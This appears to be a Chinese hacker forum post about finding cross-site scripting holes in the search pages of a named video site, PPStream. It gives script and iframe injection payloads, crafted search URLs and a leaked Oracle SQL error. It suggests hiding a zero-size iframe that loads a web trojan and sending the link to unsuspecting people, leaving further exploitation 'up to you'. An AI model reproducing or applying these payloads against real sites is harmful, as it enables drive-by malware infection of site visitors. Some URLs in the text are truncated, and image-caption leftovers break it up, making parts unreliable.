前天黑眼圈发来一个站http://www.ppstream.com/让找漏洞看了下排名.汗.全球排名589..这样的站安全系数按理来说一定很高的..想从注入方面下手机率不会很大.看了下主页有个节目搜索.输入<script>alert("fhod")</script>http://so.ppstream.com/?key=<script&g ... ")</script>出错信息[handle]QUERY STRING:select count(channel_name) from pps_channel_info where contains(playbill,?,1)>0 Biuld Array:Array( [0] => )[Last query: select count(channel_name) from pps_channel_info where contains(playbill,:0,1)>0 ][Native code: 29902][Native message: ORA-29902: error in executing ODCIIndexStart() routineORA-20000: Oracle Text error:DRG-50900: text query parser error on line 1, column 9 DRG-50905: invalid score threshold ALERT ]Error Message:MDB2 Error: unknown error开始输入的被换成了大写..<SCRIPT>ALERT("FHOD")</SCRIPT>但却不提示.试着搜索<iframe src=http://www.ciker.org/ width=200 height=200></iframe>
点击查看大图
呵.看到了把..如果把width和height都设置为0地址换成我们的网马..发给别人一个这样的地址会不会被怀疑呢http://so.ppstream.com/search/?key=经过编码地址为点击查看大图
http://so.ppstream.com/search/?key=另外http://club.ppstream.com/也存在同样的问题搜索<script>alert("fhod")</script>点击查看大图
同样的原理搜索iframe也是可以的.编码后http://club.ppstream.com/index.php?m=search&search_text=&search_type=2&x=22&y=8点击查看大图
怎么利用就随大家喜欢了..